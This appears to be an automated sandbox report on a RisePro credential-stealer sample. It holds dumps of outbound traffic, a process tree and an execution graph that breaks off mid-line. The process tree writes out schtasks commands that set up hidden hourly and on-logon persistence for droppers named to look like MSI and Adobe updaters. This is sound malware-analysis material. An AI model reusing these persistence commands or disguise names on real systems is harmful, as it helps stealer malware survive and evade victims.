                                2024-05-23 22:22:32 UTC15331OUTData Raw: d9 dc c9 b2 fe 20 17 cd ce c4 cf 13 c2 5c b7 2a fb 8b 8b 47 b6 5c 53 c4 53 c4 5f a9 cd 3e 29 66 96 2b ff bb 11 e9 c7 95 e7 e4 d0 18 d6 bf 3a 64 bf 19 74 8c b7 50 6f 79 a0 50 33 87 b1 f6 f5 bb 55 ec 21 3a 0f 35 17 7d ca c1 71 d5 29 fc d0 c6 80 fb 7d c5 7b 9a 8b 4e f2 c9 51 9f 34 5e b6 fc c4 de bc b5 e9 a4 d4 f3 a9 f7 8d 91 3a 3d b8 2f 03 90 eb e0 b5 52 d4 e4 d6 cb 8d 77 63 5a 68 96 c1 6c 27 67 e0 96 ce ba 80 44 5c de 8f 0c 6e 5d f4 27 45 e3 47 70 7d bb bf 83 28 a8 f9 19 dc 77 fa af 3a 0e 7f 86 25 bd 37 5b a4 50 e2 12 3b 7c ad 5d d3 5e 03 18 c1 26 87 85 e3 9e 84 1f 28 5b bc 45 bf c1 07 a0 39 89 03 d6 c4 54 ce 1e 65 d2 c9 b9 45 d5 4d 83 6a 06 f3 c2 88 4c cc 8b a4 d0 a8 51 21 8a d0 89 da 96 15 03 f9 07 8f 62 1a 83 6b 8a b3 fe d2 db 8f f9 8b ef 68 c7 9e 89 d0
                                Data Ascii: \*G\SS_>)f+:dtPoyP3U!:5}q)}{NQ4^:=/RwcZhl'gD\n]'EGp}(w:%7[P;|]^&([E9TeEMjLQ!bkh
                                2024-05-23 22:22:32 UTC15331OUTData Raw: 3b 7e 19 9c 15 2c 3c 79 9e 6e 25 74 4b 2a a7 46 3f 46 2b 26 b1 8a 7e e1 e4 34 f8 e1 0f bd 35 c5 2a 85 c4 22 fe 82 83 cb ff 35 fa 21 a0 f0 2e 7f 61 1e e6 02 06 6c a1 81 81 0f 34 6f 8e 90 65 4e 31 42 a4 5b 55 9f 41 52 3d 5e 2f 7d ab 0e 21 f3 a0 e1 08 8a 7e 74 ee 07 fd 6c 0a a3 21 bc 4f 14 3f f2 d6 d7 58 9f e3 ad d6 55 c1 c1 af e8 1a d8 be f8 dc 31 27 79 55 5c 10 21 f3 f8 a1 89 73 b0 07 be 51 62 28 39 57 08 e1 b2 26 4e 63 59 c0 36 43 7a e9 cc 50 76 31 e0 05 d2 8c 57 62 3c 22 e0 3d fe e8 8b ea ed 95 74 07 aa 89 8c c9 49 fe 72 f0 2c bb e0 32 1a e6 13 50 07 2f 73 6d 26 a0 53 7c d8 b5 27 3f aa 52 47 91 39 d8 bc 58 fc d3 0d 51 7b c6 b1 d4 14 71 bc bf 76 66 05 67 1f 36 b2 44 de 01 ca f4 01 25 5e a2 6f da 84 ee 93 6a 8c 81 21 9d d6 ed 99 f7 a3 89 ab bc ef 65 ad 4d
                                Data Ascii: ;~,<yn%tK*F?F+&~45*"5!.al4oeN1B[UAR=^/}!~tl!O?XU1'yU\!sQb(9W&NcY6CzPv1Wb<"=tIr,2P/sm&S|'?RG9XQ{qvfg6D%^oj!eM
                                2024-05-23 22:22:32 UTC15331OUTData Raw: 78 d5 a0 b5 7f c0 f6 1c bd d4 66 3c 73 63 52 f2 82 b8 be ef 8a ab d7 41 aa d7 ac 92 5c 44 a0 d0 61 52 b3 63 18 79 24 bb d0 66 64 5e 71 bf 68 75 95 e5 d7 4e 63 ff 8b da 93 46 8b ee 5e 3d 0d 46 af 30 d1 a0 b9 88 33 f9 eb 60 9d eb 4d 49 96 88 70 e5 99 24 77 b5 18 d2 8d 51 41 4a 0d 7c 86 f5 20 e2 a6 d8 06 96 dd fa 8b 9e 8c 1d 8f 48 2f 00 63 06 9b fa 72 cd 7a bc ef e5 96 71 81 a7 49 3d 51 21 96 e7 6e 39 ee ba 51 c0 b2 75 cb 30 af 32 de a5 74 8e 26 b9 10 43 4d 65 2e 9f 8c b3 b2 52 ca 50 ee 8b cd 10 13 8b 97 f9 b2 fa b3 3e 87 c9 cb ff 83 74 9e 76 73 16 73 5f 76 52 6f 73 df 39 d6 56 86 d0 27 39 ad 25 f0 24 ae cd 00 3e cb 76 53 65 94 4a 3e 53 48 52 17 e0 ab 09 fb c5 6a f8 47 a4 ca c4 09 57 95 df 4d f0 16 38 e4 cd e9 34 75 4a 94 7a b6 2a 85 a2 ff cb 9c 6b 0d 2c e6
                                Data Ascii: xf<scRA\DaRcy$fd^qhuNcF^=F03`MIp$wQAJ| H/crzqI=Q!n9Qu02t&CMe.RP>tvss_vRos9V'9%$>vSeJ>SHRjGWM84uJz*k,
                                2024-05-23 22:22:32 UTC15331OUTData Raw: 12 39 63 f0 ea 7f 78 c9 d4 9c 62 b4 88 c0 0f 73 7f 94 a6 76 9b 0c fc d5 43 c0 ef 53 6a 20 10 5b fa e5 99 77 67 de 75 35 f5 32 fb d4 99 c1 cc 6b d4 3b 42 15 c0 df 0f dd 7d 9a 6a fe 95 08 7e 97 fb 2e 3d 7a 4c 9d 7d 2b a7 bd 7f 17 11 34 1b 82 b5 7b 32 f0 24 ce 1e 4f 9a f3 d9 d0 92 83 2d 16 37 cd d3 6d 3d b8 3a 7b b3 af 51 23 2b 48 8d ad 67 22 3e 4e 5e de d0 3a 47 8f 86 65 b1 38 b6 c5 86 16 89 7a 82 d5 72 9d d3 d2 9e 79 95 9c b2 21 75 1d 3a 98 10 e5 ee fb 74 db 9c 47 32 31 aa 6a 9b 83 81 9b cf 70 b5 46 b2 5f 93 47 72 e5 19 49 d8 d3 49 7b a4 4c 76 d7 e9 27 48 68 87 e6 07 01 26 6c e4 51 3c 23 00 75 45 06 9f 41 15 20 5c 72 a2 cf 4c 93 c3 df e8 da 39 c1 f3 ba 08 3f 17 b0 83 5e 4a c2 7e b9 12 26 48 39 34 a4 a0 9c 56 ca f5 3b 7c 4f ea c4 b8 87 07 28 fd 47 e4 df 8c
                                Data Ascii: 9cxbsvCSj [wgu52k;B}j~.=zL}+4{2$O-7m=:{Q#+Hg">N^:Ge8zry!u:tG21jpF_GrII{Lv'Hh&lQ<#uEA \rL9?^J~&H94V;|O(G
                                2024-05-23 22:22:32 UTC15331OUTData Raw: 3b f9 0e 39 dc c4 55 87 f6 10 5c 14 22 33 fb 2f 03 9b 4a a7 73 7a f9 cc 77 1b ee 41 f8 7d 2e e3 30 7a 16 1a d5 ff 52 ae 0f 04 e3 71 40 1e 78 80 7d 4d 9b 2f d4 9e 24 59 15 9a f2 da 94 ec db 00 90 83 fb df 07 9c 07 39 bc 73 c6 4e 82 64 df 87 a9 68 ed b1 c0 3e bf 1b 1e c3 25 50 85 5e 7e bd 1a 44 2e 9d fb b5 de 97 17 9b 94 6c 8b 0b 40 f7 b7 b9 ac 8f e1 b2 e2 36 da 44 d7 33 79 f3 0b 75 17 75 ef 4a 30 65 80 c3 8a e1 3f 01 9c 28 86 b7 59 33 92 71 e6 c4 d8 13 9e e1 92 45 cb 01 1d b8 2a cb 66 79 d1 57 1f f3 9c f3 80 dd 1d d9 5b 7c 3b 21 82 d2 30 c4 fa 77 0e b7 da 70 c9 75 16 02 0d 2c 98 19 8e 74 ca bc 7d 37 da 4d 7c be 68 77 79 5b 5b 4a f9 5e ee fa c6 1c af 5b ad 8a 13 42 b1 fd 5e a4 cf 90 71 8c 62 dd cb d6 80 40 d4 32 ab c7 4b 38 4d 2c 74 e2 f1 ef bf 7e 25 6a cd
                                Data Ascii: ;9U\"3/JszwA}.0zRq@x}M/$Y9sNdh>%P^~D.l@6D3yuuJ0e?(Y3qE*fyW[|;!0wpu,t}7M|hwy[[J^[B^qb@2K8M,t~%j
                                2024-05-23 22:22:32 UTC15331OUTData Raw: b7 47 71 f5 22 13 91 09 01 ca 8b f2 9b c3 f5 dc 44 1d 06 b1 82 cd 94 44 31 5b 56 ab 7b 2b 79 e3 22 ef 16 dc e2 e3 cc e1 c4 d9 01 ec 2c a4 8a 90 51 3d 72 33 74 1f 59 85 e4 d6 6e eb 29 56 f8 f8 ef bf e9 75 e8 fc af 2e 47 a8 d2 d8 fd b3 af e6 b5 d0 e0 fd b4 39 1f 20 67 1b 70 4f 53 50 88 b5 67 bf c1 95 6d 19 3e f4 40 f4 79 5b cf 39 b6 8e 94 b7 1e 48 b8 4f 4b f3 e3 8a 06 80 cd 3d 0c e6 5a 7d 24 91 41 64 98 68 ae 33 24 7c 49 0a a2 97 02 bb 0c 51 21 15 c6 08 62 3c 2c 84 28 c9 f2 5d b9 e5 7a 84 16 36 5b 14 52 a3 d9 ba a6 86 7d 57 02 ba 57 bd b2 a2 1d 90 e0 69 40 da 1b b7 1a 9b 4e 7f 65 0f 81 4f 7b 4c 5d b7 49 92 b2 eb 4c d0 b1 3f 57 f2 34 eb 94 05 6e f4 a6 b6 db 38 47 af 36 af c3 9e 22 8d d3 0c 79 70 d2 73 75 fb f8 c8 fb 18 d2 14 37 29 c2 fc 3e c6 89 5a 2a e1 e0
                                Data Ascii: Gq"DD1[V{+y",Q=r3tYn)Vu.G9 gpOSPgm>@y[9HOK=Z}$Adh3$|IQ!b<,(]z6[R}WWi@NeO{L]IL?W4n8G6"ypsu7)>Z*
                                2024-05-23 22:22:32 UTC15331OUTData Raw: bc 5f 98 2a 7c dd ab 39 86 77 83 c0 3d 6d 23 3d 8d 04 df 9c 4f b3 d2 f8 ca 8b da f8 bd 4a c6 9f 3b aa d1 32 50 d2 67 27 0f d8 fc 8e 9c 7c 24 26 32 78 f3 af 79 fe f0 9e 87 f5 09 11 eb 42 56 48 b7 fa 56 c7 d9 6c 98 2d c9 12 46 01 f9 5f a3 f9 37 ac 9d 59 06 47 af b0 44 c0 d3 1d ce bf 92 2f 1e c9 71 16 66 64 da d2 cd 8c 37 f1 6c 71 94 55 95 2b bf ae 53 aa 85 f4 f2 96 b6 91 3d 45 b5 27 14 1f 0a 36 9e 20 3d d4 26 95 6b 54 21 c8 5b f1 b5 fb a3 a7 ba 36 23 74 75 c1 27 d1 63 8f ff fb 98 2c 19 4b e4 29 2b 26 6a 8a 37 28 d2 1b ca 56 8a 96 bf 63 65 e6 3c 2b aa 2f fc f0 0e af 9f c9 5c 60 6f 70 ed 63 3e 19 8c 86 cd b5 94 87 13 bd fe 66 6e 8c 96 b0 83 03 47 7d e7 28 03 16 7f d6 36 b9 4e f9 16 bb 4c 3a 28 ac 6c 2c 3e 41 8c b9 46 c0 c5 1c 4a 78 3d 6e 7e fc 7d 62 01 e7 17
                                Data Ascii: _*|9w=m#=OJ;2Pg'|$&2xyBVHVl-F_7YGD/qfd7lqU+S=E'6 =&kT![6#tu'c,K)+&j7(Vce<+/\`opc>fnG}(6NL:(l,>AFJx=n~}b
                                2024-05-23 22:22:35 UTC814INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:35 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=vvhbd18el45rradqubonstgnlr; expires=Mon, 16-Sep-2024 16:09:13 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kzenUhTPKvjcEvK5rqn9X7XwpkA7LMpMn%2BssJkTXDSMjt9XkriV%2BekYsbwDIDuVJ0CwNlvCJ3AtRZgACdd%2F9o23luJ94hsQrVRB%2BB2Qp6YnbqlzTbLBJJHvV2CHpEOshkOcHK8jQH8u97A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 888871fefcd718cc-EWR
                                alt-svc: h3=":443"; ma=86400


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:18:21:51
                                Start date:23/05/2024
                                Path:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\tMO4FVIc9l.exe"
                                Imagebase:0x820000
                                File size:3'134'976 bytes
                                MD5 hash:6BC7F3C7927F5FC13A4410F1770C2DFE
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000003.2155682026.0000000006044000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000002.2259208520.000000000611B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Target ID:3
                                Start time:18:22:01
                                Start date:23/05/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 HR" /sc HOURLY /rl HIGHEST
                                Imagebase:0x730000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:18:22:01
                                Start date:23/05/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:5
                                Start time:18:22:02
                                Start date:23/05/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 LG" /sc ONLOGON /rl HIGHEST
                                Imagebase:0x730000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:6
                                Start time:18:22:02
                                Start date:23/05/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:7
                                Start time:18:22:02
                                Start date:23/05/2024
                                Path:C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe"
                                Imagebase:0x4e0000
                                File size:468'480 bytes
                                MD5 hash:F14B083F53FEFD0071732BF5C0DCD6FA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 45%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                Target ID:8
                                Start time:18:22:02
                                Start date:23/05/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Imagebase:0x4a0000
                                File size:65'440 bytes
                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                Target ID:9
                                Start time:18:22:02
                                Start date:23/05/2024
                                Path:C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe
                                Wow64 process (32bit):true
                                Commandline:C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe
                                Imagebase:0xbf0000
                                File size:468'480 bytes
                                MD5 hash:F14B083F53FEFD0071732BF5C0DCD6FA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 45%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                Target ID:10
                                Start time:18:22:02
                                Start date:23/05/2024
                                Path:C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe
                                Wow64 process (32bit):true
                                Commandline:C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe
                                Imagebase:0xbf0000
                                File size:468'480 bytes
                                MD5 hash:F14B083F53FEFD0071732BF5C0DCD6FA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:11
                                Start time:18:22:03
                                Start date:23/05/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Imagebase:0xc80000
                                File size:65'440 bytes
                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:12
                                Start time:18:22:03
                                Start date:23/05/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Imagebase:0xad0000
                                File size:65'440 bytes
                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:15
                                Start time:18:22:05
                                Start date:23/05/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3108 -s 2688
                                Imagebase:0x7d0000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:17
                                Start time:18:22:12
                                Start date:23/05/2024
                                Path:C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe"
                                Imagebase:0xe90000
                                File size:468'480 bytes
                                MD5 hash:F14B083F53FEFD0071732BF5C0DCD6FA
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 45%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                Target ID:20
                                Start time:18:22:12
                                Start date:23/05/2024
                                Path:C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe"
                                Imagebase:0xe90000
                                File size:468'480 bytes
                                MD5 hash:F14B083F53FEFD0071732BF5C0DCD6FA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:21
                                Start time:18:22:12
                                Start date:23/05/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Imagebase:0xef0000
                                File size:65'440 bytes
                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:22
                                Start time:18:22:20
                                Start date:23/05/2024
                                Path:C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe"
                                Imagebase:0xe90000
                                File size:468'480 bytes
                                MD5 hash:F14B083F53FEFD0071732BF5C0DCD6FA
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:24
                                Start time:18:22:20
                                Start date:23/05/2024
                                Path:C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe"
                                Imagebase:0xe90000
                                File size:468'480 bytes
                                MD5 hash:F14B083F53FEFD0071732BF5C0DCD6FA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:25
                                Start time:18:22:20
                                Start date:23/05/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Imagebase:0x710000
                                File size:65'440 bytes
                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:12.6%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:23.7%
                                  Total number of Nodes:1394
                                  Total number of Limit Nodes:36
                                  execution_graph 44739 965de0 44740 965df8 44739->44740 44741 965e4a 44740->44741 44744 965eb7 44740->44744 44748 965ea5 44741->44748 44749 969d90 44741->44749 44747 969d90 GetLastError 44744->44747 44744->44748 44747->44748 44750 965e8c 44749->44750 44751 969d9b 44749->44751 44750->44748 44753 966470 44750->44753 44751->44750 44756 861c96 44751->44756 44754 969d90 GetLastError 44753->44754 44755 965e9c 44754->44755 44759 86b01a 44756->44759 44758 861cae 44758->44750 44760 86b025 44759->44760 44762 86b047 __dosmaperr 44759->44762 44761 86b03a GetLastError 44760->44761 44760->44762 44761->44762 44762->44758 44763 aa623d 44763->44763 44764 902edd 44763->44764 44765 903186 RegOpenKeyExA 44764->44765 44765->44763 44766 87f740 44767 87f794 44766->44767 44768 8802ea 44766->44768 44843 906ca0 44767->44843 44769 906ca0 4 API calls 44768->44769 44771 880404 44769->44771 44773 906c10 4 API calls 44771->44773 44776 880427 44771->44776 44772 87f89c 44775 87f8bf 44772->44775 44854 906c10 44772->44854 44773->44776 44775->44768 44777 83b260 3 API calls 44775->44777 44782 8802c0 44775->44782 44781 881b1b 44776->44781 44783 881af1 44776->44783 44880 83b260 44776->44880 44798 87f8ef std::_Throw_Cpp_error 44777->44798 44780 906770 4 API calls 44780->44781 44782->44768 44864 906770 44782->44864 44783->44780 44783->44781 44784 8330f0 GetLastError GetLastError GetLastError 44784->44798 44785 8330f0 GetLastError GetLastError GetLastError 44810 880457 std::_Throw_Cpp_error 44785->44810 44786 833200 GetLastError GetLastError GetLastError 44786->44798 44787 83b260 3 API calls 44787->44798 44788 83b260 3 API calls 44788->44810 44789 83ac50 GetLastError GetLastError GetLastError 44789->44798 44790 906c10 GetLastError GetLastError GetLastError CreateDirectoryA 44790->44810 44791 83ac50 GetLastError GetLastError GetLastError 44791->44810 44792 906ca0 GetLastError GetLastError GetLastError GetLastError 44792->44798 44793 906ca0 GetLastError GetLastError GetLastError GetLastError 44793->44810 44794 906c10 GetLastError GetLastError GetLastError CreateDirectoryA 44794->44798 44795 833200 GetLastError GetLastError GetLastError 44795->44810 44796 83af80 GetLastError GetLastError GetLastError 44796->44798 44798->44782 44798->44784 44798->44786 44798->44787 44798->44789 44798->44792 44798->44794 44798->44796 44904 83b400 GetLastError GetLastError GetLastError 44798->44904 44905 83bae0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 44798->44905 44800 83b400 GetLastError GetLastError GetLastError 44800->44810 44803 83af80 GetLastError GetLastError GetLastError 44803->44810 44804 881e04 44901 858c70 44804->44901 44806 881e09 44807 906ca0 GetLastError GetLastError GetLastError GetLastError 44806->44807 44808 881f5a 44807->44808 44809 906c10 GetLastError GetLastError GetLastError CreateDirectoryA 44808->44809 44812 881f7d 44808->44812 44809->44812 44810->44783 44810->44785 44810->44788 44810->44790 44810->44791 44810->44793 44810->44795 44810->44800 44810->44803 44810->44804 44811 836260 GetLastError GetLastError GetLastError 44810->44811 44890 8419a0 44810->44890 44897 83ace0 44810->44897 44811->44810 44813 83b260 GetLastError GetLastError GetLastError 44812->44813 44815 882990 44812->44815 44816 8829be 44812->44816 44839 881fad std::_Throw_Cpp_error 44813->44839 44814 906770 GetLastError GetLastError GetLastError GetLastError 44814->44816 44815->44814 44815->44816 44817 906ca0 GetLastError GetLastError GetLastError GetLastError 44816->44817 44818 882ac9 44817->44818 44819 906c10 GetLastError GetLastError GetLastError CreateDirectoryA 44818->44819 44820 882aec 44818->44820 44819->44820 44821 83b260 GetLastError GetLastError GetLastError 44820->44821 44824 883529 44820->44824 44825 8834ff 44820->44825 44841 882b1c std::_Throw_Cpp_error 44821->44841 44822 8330f0 GetLastError GetLastError GetLastError 44822->44839 44823 906770 GetLastError GetLastError GetLastError GetLastError 44823->44824 44825->44823 44825->44824 44826 833200 GetLastError GetLastError GetLastError 44826->44839 44827 83b260 GetLastError GetLastError GetLastError 44827->44839 44828 833200 GetLastError GetLastError GetLastError 44828->44841 44829 83b260 GetLastError GetLastError GetLastError 44829->44841 44830 906ca0 GetLastError GetLastError GetLastError GetLastError 44830->44839 44831 906c10 GetLastError GetLastError GetLastError CreateDirectoryA 44831->44839 44832 83ac50 GetLastError GetLastError GetLastError 44832->44839 44833 906ca0 GetLastError GetLastError GetLastError GetLastError 44833->44841 44834 906c10 GetLastError GetLastError GetLastError CreateDirectoryA 44834->44841 44835 83ac50 GetLastError GetLastError GetLastError 44835->44841 44836 8330f0 GetLastError GetLastError GetLastError 44836->44841 44837 83b400 GetLastError GetLastError GetLastError 44837->44839 44838 83af80 GetLastError GetLastError GetLastError 44838->44839 44839->44815 44839->44822 44839->44826 44839->44827 44839->44830 44839->44831 44839->44832 44839->44837 44839->44838 44840 83af80 GetLastError GetLastError GetLastError 44840->44841 44841->44825 44841->44828 44841->44829 44841->44833 44841->44834 44841->44835 44841->44836 44841->44840 44842 83b400 GetLastError GetLastError GetLastError 44841->44842 44842->44841 44844 906cd0 44843->44844 44845 906cd7 44844->44845 44846 906d4d 44844->44846 44847 906d54 44845->44847 44851 906ce3 44845->44851 44906 852534 GetLastError GetLastError GetLastError __EH_prolog3 std::_Throw_Cpp_error 44846->44906 44907 852534 GetLastError GetLastError GetLastError __EH_prolog3 std::_Throw_Cpp_error 44847->44907 44850 906d65 44852 906d12 44851->44852 44853 906d07 GetLastError 44851->44853 44852->44772 44853->44852 44855 906c3d 44854->44855 44856 906c82 44855->44856 44857 906c44 44855->44857 44908 852534 GetLastError GetLastError GetLastError __EH_prolog3 std::_Throw_Cpp_error 44856->44908 44858 906c50 CreateDirectoryA 44857->44858 44859 906c89 44857->44859 44863 906c6e 44858->44863 44909 852534 GetLastError GetLastError GetLastError __EH_prolog3 std::_Throw_Cpp_error 44859->44909 44862 906c9a 44863->44775 44865 9067be 44864->44865 44866 906be5 44865->44866 44867 9067c9 44865->44867 44910 852534 GetLastError GetLastError GetLastError __EH_prolog3 std::_Throw_Cpp_error 44866->44910 44869 906bec 44867->44869 44874 9067d9 std::_Throw_Cpp_error 44867->44874 44911 852534 GetLastError GetLastError GetLastError __EH_prolog3 std::_Throw_Cpp_error 44869->44911 44871 906bfd 44872 858c70 std::_Throw_Cpp_error 3 API calls 44871->44872 44876 906ac7 std::_Throw_Cpp_error 44872->44876 44873 858c70 std::_Throw_Cpp_error 3 API calls 44875 906c0c 44873->44875 44874->44871 44874->44876 44878 906770 3 API calls 44874->44878 44879 906b20 GetLastError 44874->44879 44876->44873 44877 906ba0 std::_Throw_Cpp_error 44876->44877 44877->44768 44878->44874 44879->44876 44881 83b2b8 std::_Throw_Cpp_error 44880->44881 44882 83b2e2 std::_Throw_Cpp_error 44881->44882 44883 